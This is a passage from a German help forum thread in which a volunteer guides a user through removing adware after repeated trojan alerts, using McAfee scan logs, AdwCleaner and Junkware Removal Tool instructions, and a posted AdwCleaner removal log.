4/2/2016	9:02:37 PM	Scan Done: 04/02/2016 09:02:37 PM

4/4/2016	3:45:56 PM	Scan Started: 04/04/2016 03:45:56 PM

4/6/2016	3:01:54 PM	Total objects scanned: 11672

4/6/2016	3:01:54 PM	Objects detected: 0

4/6/2016	3:01:54 PM	Scan Done: 04/06/2016 03:01:54 PM

4/7/2016	7:57:58 PM	Scan Started: 04/07/2016 07:57:58 PM

4/8/2016	6:37:28 PM	Total objects scanned: 422285

4/8/2016	6:37:28 PM	Objects detected: 0

4/8/2016	6:37:28 PM	Scan Done: 04/08/2016 06:37:28 PM

4/8/2016	9:28:49 PM	Scan Started: 04/08/2016 09:28:49 PM

4/8/2016	9:30:05 PM	Total objects scanned: 11328

4/8/2016	9:30:05 PM	Objects detected: 0

4/8/2016	9:30:05 PM	Scan Done: 04/08/2016 09:30:05 PM

4/12/2016	12:37:39 PM	Scan Started: 04/12/2016 12:37:39 PM

4/12/2016	12:38:52 PM	Total objects scanned: 11225

4/12/2016	12:38:52 PM	Objects detected: 0

4/12/2016	12:38:52 PM	Scan Done: 04/12/2016 12:38:52 PM

4/12/2016	5:20:49 PM	Scan Started: 04/12/2016 05:20:49 PM

4/12/2016	7:35:59 PM	Total objects scanned: 11503

4/12/2016	7:35:59 PM	Objects detected: 0

4/12/2016	7:35:59 PM	Scan Done: 04/12/2016 07:35:59 PM

4/14/2016	7:40:13 PM	Scan Started: 04/14/2016 07:40:13 PM

4/14/2016	7:41:28 PM	Total objects scanned: 11285

4/14/2016	7:41:28 PM	Objects detected: 0

4/14/2016	7:41:28 PM	Scan Done: 04/14/2016 07:41:28 PM

4/15/2016	4:53:07 PM	Scan Started: 04/15/2016 04:53:07 PM

4/15/2016	8:21:05 PM	Total objects scanned: 396907

4/15/2016	8:21:05 PM	Objects detected: 0

4/15/2016	8:21:05 PM	Scan Done: 04/15/2016 08:21:05 PM

4/16/2016	8:41:13 PM	Scan Started: 04/16/2016 08:41:13 PM

4/16/2016	8:46:47 PM	Total objects scanned: 12069

4/16/2016	8:46:47 PM	Objects detected: 0

4/16/2016	8:46:47 PM	Scan Done: 04/16/2016 08:46:47 PM

4/18/2016	8:49:47 PM	Scan Started: 04/18/2016 08:49:47 PM

4/19/2016	3:54:15 PM	Total objects scanned: 11800

4/19/2016	3:54:15 PM	Objects detected: 0

4/19/2016	3:54:15 PM	Scan Done: 04/19/2016 03:54:15 PM

4/19/2016	8:47:31 PM	Scan Started: 04/19/2016 08:47:31 PM

4/19/2016	8:48:51 PM	Total objects scanned: 11884

4/19/2016	8:48:51 PM	Objects detected: 0

4/19/2016	8:48:51 PM	Scan Done: 04/19/2016 08:48:51 PM

4/21/2016	8:32:15 PM	Scan Started: 04/21/2016 08:32:15 PM

4/21/2016	8:42:06 PM	Total objects scanned: 81271

4/21/2016	8:42:06 PM	Objects detected: 0

4/21/2016	8:42:06 PM	Scan Done: 04/21/2016 08:42:06 PM

4/21/2016	8:49:40 PM	Scan Started: 04/21/2016 08:49:40 PM

4/21/2016	8:51:14 PM	Total objects scanned: 11980

4/21/2016	8:51:14 PM	Objects detected: 0

4/21/2016	8:51:14 PM	Scan Done: 04/21/2016 08:51:14 PM

4/22/2016	3:23:23 PM	Scan Started: 04/22/2016 03:23:23 PM

4/22/2016	4:54:05 PM	Total objects scanned: 276657

4/22/2016	4:54:05 PM	Objects detected: 0

4/22/2016	4:54:05 PM	Scan Done: 04/22/2016 04:54:05 PM

4/23/2016	10:23:20 PM	Scan Started: 04/23/2016 10:23:20 PM

4/23/2016	10:24:39 PM	Total objects scanned: 11967

4/23/2016	10:24:39 PM	Objects detected: 0

4/23/2016	10:24:39 PM	Scan Done: 04/23/2016 10:24:39 PM

4/24/2016	4:02:23 PM	Scan Started: 04/24/2016 04:02:23 PM

4/24/2016	4:25:59 PM	Total objects scanned: 34107

4/24/2016	4:25:59 PM	Objects detected: 0

4/24/2016	4:25:59 PM	Scan Done: 04/24/2016 04:25:59 PM

4/25/2016	3:49:00 PM	Scan Started: 04/25/2016 03:49:00 PM

4/25/2016	5:19:06 PM	Total objects scanned: 34061

4/25/2016	5:19:06 PM	Objects detected: 0

4/25/2016	5:19:06 PM	Scan Done: 04/25/2016 05:19:06 PM
         
Jetzt kannst du hoffentlich nicht mehr meckern

Das mag jetzt zwar ein bisschen blöd klingen aber.. kann es sein das der Trojaner-Scaner von McAfee mich "verappeln" möchte (ich hoffe du verstehst was ich meine). Denn McAfee hat einen Neustart-Scan ausgeführt und wieder nichts gefunden obwohl immer die Meldung aufkommt (Trojaner gefunden), welche heute zum glück noch nicht gekommen ist

Konntest du schon was mit den McAfee Logs anfangen?
__________________

Alt 27.04.2016, 21:59   #19
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Ja das ist schon besser

Hast du den Schritt mit revo ausgeführt?
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 27.04.2016, 22:29   #20
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Das ist doch schön ^^

Ja habe ich. Allerdings.. habe ich dieses Amazon 1click, Buzzdock und WebBar 2.0... nicht gefunden. Bei AVG habe ich nur AVG TuneUp deeinstalliert, da ich das andere nicht gefunden habe.
PS.: die Meldung "Trojaner gefunden" kam wieder


Alt 27.04.2016, 22:33   #21
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Adware/Junkware/Toolbars entfernen

Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!
Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren!


1. Schritt: adwCleaner

Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).




2. Schritt: JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.

__________________
--> Trojaner: FIEE!33F043CBDBF2

Alt 28.04.2016, 19:17   #22
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Danke jetzt schon mal für alles ^^
Ich setze mich morgen mal daran, mal schauen ob's hilft

Hier ist das Log ^^AdwCleaner Logfile:
Code:
ATTFilter
# AdwCleaner v5.114 - Bericht erstellt am 28/04/2016 um 17:02:10
# Aktualisiert am 27/04/2016 von Xplode
# Datenbank : 2016-04-27.1 [Server]
# Betriebssystem : Windows 10 Home  (X64)
# Benutzername : Maximilian - LAPTOP-6N843D06
# Gestartet von : C:\Users\Maximilian\Downloads\adwcleaner_5.114.exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****

[-] Dienst gelöscht : wbsvc

***** [ Ordner ] *****

[-] Ordner gelöscht : C:\ProgramData\DriverSetupUtility
[-] Ordner gelöscht : C:\ProgramData\3f50a886
[-] Ordner gelöscht : C:\ProgramData\7607d362-0147-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-0395-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-0491-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-0951-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-09d7-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-0b97-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-0d71-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-0e77-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-1251-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-1361-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-14c7-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-1687-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-1855-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-1a81-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-1ab1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-2087-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-20f7-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2261-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-22e3-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2421-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2543-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2663-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-27f3-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-28b7-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-29c3-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-2a53-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2be1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-2c65-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-2d71-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-2db3-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2e83-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-2e97-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-2f23-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-3197-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-3393-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-3483-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-3777-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-39c1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-3b51-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-3d57-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-3e47-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-4013-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-4015-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-4057-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-4163-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-41f5-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-4387-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-44c1-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-45d1-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-4797-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-47c1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-4d41-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-4e95-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-50f3-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-5215-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-5283-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-5295-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-5383-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-57f1-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-5887-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-58d1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-5af1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-5be7-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-5c53-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-5e95-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-60f5-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-6575-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-6577-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-68a1-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-6937-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-6d25-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-6ea1-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-6fa5-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-7107-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-7181-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-72a5-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-7363-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-7437-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-7471-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-75a7-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-7605-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-7643-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-7bb1-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-7e15-0
[-] Ordner gelöscht : C:\ProgramData\7607d362-7f15-1
[-] Ordner gelöscht : C:\ProgramData\7607d362-7fb5-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0143-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0235-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0347-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0481-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0703-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0887-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0ac1-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-0d17-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-10a7-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1501-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1593-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1851-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1863-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1b61-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1c73-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1c77-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1cd3-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-1d61-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-22d3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-24e3-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-2505-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-2545-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-2791-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-2a95-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-2c55-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-2e25-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-3065-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-3233-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-32d3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-35c7-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-36c7-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-3737-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-3aa3-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-3ad3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4047-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4327-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4467-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-44b3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-45b1-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-46e1-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4717-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-47d1-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4807-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-48a7-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-49f5-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4ab7-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4b47-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4b77-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4c27-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4c71-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-4da7-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5097-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5181-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-52d1-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5551-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5567-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-56b1-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5991-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-59a3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5b03-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5df3-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5eb3-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-5ef3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-63d5-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6541-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6701-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6771-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-69b1-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6b31-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6b83-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6ba3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6c97-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6cd7-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6d33-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-6e35-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7403-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7651-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7711-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7737-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7985-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-79f3-0
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7a37-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7bb3-1
[-] Ordner gelöscht : C:\ProgramData\83adbc82-7e55-1
[-] Ordner gelöscht : C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974
[-] Ordner gelöscht : C:\ProgramData\{059db2a4-012c-0}
[-] Ordner gelöscht : C:\ProgramData\{14ce6835-312c-1}
[-] Ordner gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Clean Plus
[-] Ordner gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip Registry Optimizer
[-] Ordner gelöscht : C:\Program Files (x86)\PC Clean Plus
[-] Ordner gelöscht : C:\Program Files (x86)\WinZip Registry Optimizer
[-] Ordner gelöscht : C:\Program Files (x86)\Common Files\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974
[-] Ordner gelöscht : C:\Users\Maximilian\AppData\Local\Gameo
[-] Ordner gelöscht : C:\Users\Maximilian\AppData\Local\WebBar
[-] Ordner gelöscht : C:\Users\Maximilian\AppData\Local\Host App Service
[-] Ordner gelöscht : C:\Users\Maximilian\AppData\Roaming\GoldenGate
[-] Ordner gelöscht : C:\Users\Maximilian\AppData\Roaming\PC Clean Plus
[-] Ordner gelöscht : C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\extensions\abb@amazon.com
[-] Ordner gelöscht : C:\Program Files\WebBar
[-] Ordner gelöscht : C:\Program Files\Booking.com
[-] Ordner gelöscht : C:\Program Files\DriverSetupUtility

***** [ Dateien ] *****

[-] Datei gelöscht : C:\Users\Public\Desktop\Booking.com.lnk
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\searchplugins\Web Search.xml
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\searchplugins\default.xml
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage-journal
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_pstatic.bestpriceninja.com_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_pstatic.bestpriceninja.com_0.localstorage-journal
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_pstatic.eshopcomp.com_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_pstatic.eshopcomp.com_0.localstorage-journal
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_utop.it_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_utop.it_0.localstorage-journal
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage-journal
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.eshopcomp.com_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.eshopcomp.com_0.localstorage-journal
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_utop.it_0.localstorage
[-] Datei gelöscht : C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_utop.it_0.localstorage-journal
[-] Datei gelöscht : C:\WINDOWS\SysNative\roboot64.exe

***** [ DLLs ] *****


***** [ WMI ] *****


***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****

[-] Geplante Aufgabe gelöscht : WebBarLaunchTask
[-] Geplante Aufgabe gelöscht : WebBarUpdateTask
[-] Geplante Aufgabe gelöscht : Registry Optimizer_UPDATES
[-] Geplante Aufgabe gelöscht : Registry Optimizer
[-] Geplante Aufgabe gelöscht : Registry Optimizer_DEFAULT
[-] Geplante Aufgabe gelöscht : ACC
[-] Geplante Aufgabe gelöscht : Start Registry Reviver Schedule
[-] Geplante Aufgabe gelöscht : Start Registry Reviver Update

***** [ Registrierungsdatenbank ] *****

[-] Wert gelöscht : HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [wb.exe]
[-] Schlüssel gelöscht : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[-] Wert gelöscht : HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [SystemCash.exe]
[-] Wert gelöscht : HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [SystemCash.exe]
[-] Schlüssel gelöscht : HKLM\SOFTWARE\5da059a482fd494db3f252126fbc3d5b
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3f50a886}
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Classes\CLSID\{0757C9D8-D8A3-33F5-CEE2-11D09918BA8F}
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Wert gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C424171E-592A-415A-9EB1-DFD6D95D3530}]
[-] Wert gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C424171E-592A-415A-9EB1-DFD6D95D3530}]
[-] Schlüssel gelöscht : HKCU\Software\Download4windows
[-] Schlüssel gelöscht : HKCU\Software\gameo
[-] Schlüssel gelöscht : HKCU\Software\GoldenGate
[-] Schlüssel gelöscht : HKCU\Software\ICSW1.17
[-] Schlüssel gelöscht : HKCU\Software\OCS
[-] Schlüssel gelöscht : HKCU\Software\PC Clean Plus
[-] Schlüssel gelöscht : HKCU\Software\PRODUCTSETUP
[-] Schlüssel gelöscht : HKCU\Software\PC
[-] Schlüssel gelöscht : HKCU\Software\Host App Service
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Jawego
[-] Schlüssel gelöscht : HKLM\SOFTWARE\PC Clean Plus
[-] Schlüssel gelöscht : HKLM\SOFTWARE\PC
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Clean Plus_is1
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WinZip Registry Optimizer_is1
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Schlüssel gelöscht : [x64] HKLM\SOFTWARE\registry Reviver
[-] Schlüssel gelöscht : [x64] HKLM\SOFTWARE\WebBar
[-] Schlüssel gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0BCE8B0A-1E76-44E5-9909-3CF804D92E4D}_is1
[-] Schlüssel gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\registry Reviver
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C}
[-] Schlüssel gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C}
[-] Schlüssel gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C}
[-] Daten wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{05becd0a-1f08-4574-a11f-dcbc438c439a} [NameServer]
[-] Daten wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{34cf8eb3-1466-45c8-8888-050c07fa1b69} [NameServer]
[-] Daten wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{570d79df-7ac5-4e57-b054-5e734a41a782} [NameServer]
[-] Daten wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{97b04f45-e598-47a5-a0e3-9857de5fc585} [NameServer]
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\bestpriceninja.com
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\eshopcomp.com
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
